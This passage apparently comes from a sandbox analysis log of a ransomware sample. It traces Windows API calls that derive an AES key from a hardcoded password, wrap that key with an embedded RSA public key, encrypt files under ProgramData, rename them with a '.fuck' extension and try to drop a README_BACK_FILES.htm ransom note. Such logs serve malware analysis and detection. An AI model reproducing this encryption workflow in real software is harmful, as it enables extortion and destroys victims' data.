nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.152] CryptEncrypt (in: hKey=0x2817c18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.152] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.152] CloseHandle (hObject=0xffffffff) returned 1 [0237.152] CloseHandle (hObject=0xffffffff) returned 1 [0237.153] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.153] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.154] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.gsg")) returned 0 [0237.154] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.fuck")) returned 0 [0237.154] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.154] CryptDestroyKey (hKey=0x2817c18) returned 1 [0237.154] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.155] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.155] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817098 [0237.155] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.155] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.155] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2817458 [0237.156] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.156] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.156] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.156] GetLastError () returned 0x5 [0237.156] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.157] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.157] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.157] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.158] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.158] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2832f28) returned 1 [0237.162] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.162] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.163] CryptHashData (hHash=0x2817858, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.163] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817858, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817c58) returned 1 [0237.163] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.163] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.163] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28340b0) returned 1 [0237.164] CryptImportPublicKeyInfo (in: hCryptProv=0x28340b0, dwCertEncodingType=0x1, pInfo=0x283b158*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b188*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b190*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817918) returned 1 [0237.164] CryptEncrypt (in: hKey=0x2817918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.164] CryptEncrypt (in: hKey=0x2817918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833830*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2833830*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.164] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833830, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.164] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.164] CryptEncrypt (in: hKey=0x2817c58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.165] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.165] CloseHandle (hObject=0xffffffff) returned 1 [0237.165] CloseHandle (hObject=0xffffffff) returned 1 [0237.165] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.165] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.165] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.166] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.166] CryptDestroyHash (hHash=0x2817858) returned 1 [0237.166] CryptDestroyKey (hKey=0x2817c58) returned 1 [0237.166] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.166] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.166] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.166] GetLastError () returned 0x5 [0237.166] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.166] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.167] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.167] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.168] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.168] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2832f28) returned 1 [0237.173] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.173] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.173] CryptHashData (hHash=0x28179d8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.173] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x28179d8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817b58) returned 1 [0237.173] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.173] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.173] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2833be8) returned 1 [0237.175] CryptImportPublicKeyInfo (in: hCryptProv=0x2833be8, dwCertEncodingType=0x1, pInfo=0x283afb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283afe8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283aff0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817758) returned 1 [0237.175] CryptEncrypt (in: hKey=0x2817758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.175] CryptEncrypt (in: hKey=0x2817758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833f18*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2833f18*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.175] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833f18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.175] ReadFile (in: hFile=0xffffffff, lpBuffer=0x283c500, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x283c500, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.175] CryptEncrypt (in: hKey=0x2817b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x283c500*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x283c500*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.175] WriteFile (in: hFile=0xffffffff, lpBuffer=0x283c500, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.175] CloseHandle (hObject=0xffffffff) returned 1 [0237.175] CloseHandle (hObject=0xffffffff) returned 1 [0237.175] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.176] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.176] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.176] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.177] CryptDestroyHash (hHash=0x28179d8) returned 1 [0237.177] CryptDestroyKey (hKey=0x2817b58) returned 1 [0237.177] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.177] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.177] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0237.189] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.189] AreFileApisANSI () returned 1 [0237.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2832f28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.189] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.189] GetLastError () returned 0x5 [0237.189] GetLastError () returned 0x5 [0237.189] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.189] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.190] GetLastError () returned 0x5 [0237.190] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml")) returned 0x20 [0237.190] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.190] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.190] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.191] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.191] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2832f28) returned 1 [0237.196] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.196] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.196] CryptHashData (hHash=0x2817458, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.196] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817858) returned 1 [0237.196] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.196] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.196] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2833e90) returned 1 [0237.197] CryptImportPublicKeyInfo (in: hCryptProv=0x2833e90, dwCertEncodingType=0x1, pInfo=0x283be58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283be88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283be90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817c58) returned 1 [0237.198] CryptEncrypt (in: hKey=0x2817c58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.198] CryptEncrypt (in: hKey=0x2817c58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833cf8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2833cf8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.198] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833cf8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.198] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.198] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.198] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.199] CloseHandle (hObject=0xffffffff) returned 1 [0237.199] CloseHandle (hObject=0xffffffff) returned 1 [0237.199] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: 